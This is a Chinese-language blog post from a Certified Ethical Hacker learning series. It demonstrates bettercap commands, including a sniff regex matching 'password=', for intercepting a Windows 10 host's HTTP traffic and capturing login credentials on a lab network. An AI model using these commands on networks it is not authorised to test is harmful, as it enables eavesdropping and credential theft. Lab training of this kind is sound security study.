iT邦幫忙

2021 iThome 鐵人賽

DAY 20
0
Security

Certificated Ethical Hacker菜雞上路系列 第 20

Day20:今天我們來聊一下如何使用bettercap工具來攔截 HTTP 流量

  • 分享至 

  • xImage
  •  

攻擊者可以使用session hijacking來發起各種攻擊,例如中間人(MITM)攻擊。

在MITM攻擊中,攻擊者將自己置於授權客戶端和網絡服務器之間,以便在任一方向

傳輸的所有信息都通過它們。作為滲透測試員必須了解MITM攻擊的工作原理,

以便保護組織的敏感信息免受他們的侵害。

登入Parrot Security主機,輸入sudo su切換身份

輸入cd切換目録

輸入指令bettercap -h查看指令用法

https://ithelp.ithome.com.tw/upload/images/20211004/20112182rJACeBtAPB.png

輸入指令bettercap -iface eth0開始執行

https://ithelp.ithome.com.tw/upload/images/20211004/201121820yeow5vdfV.png

輸入help

https://ithelp.ithome.com.tw/upload/images/20211004/20112182XKFQ6tEeFd.png

輸入指令net.probe on

輸入指令net.recon on

輸入指令set net.sniff.regexp ‘.*password=.+’

https://ithelp.ithome.com.tw/upload/images/20211004/20112182fRSxnCIbt6.png

我們可以從bettercap去攔劫Windows 10主機的網路流量

https://ithelp.ithome.com.tw/upload/images/20211004/20112182MVMiIE53cq.png

從中截取到在Windows 10登入網站輸入的帳號/密碼(實做有問題先放示意圖)

https://ithelp.ithome.com.tw/upload/images/20211004/201121826mjHOfH3UX.png


上一篇
Day19:今天來聊一下Denial-of-Service
下一篇
Day21:今天來聊一下Firewall的Evasion
系列文
Certificated Ethical Hacker菜雞上路30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言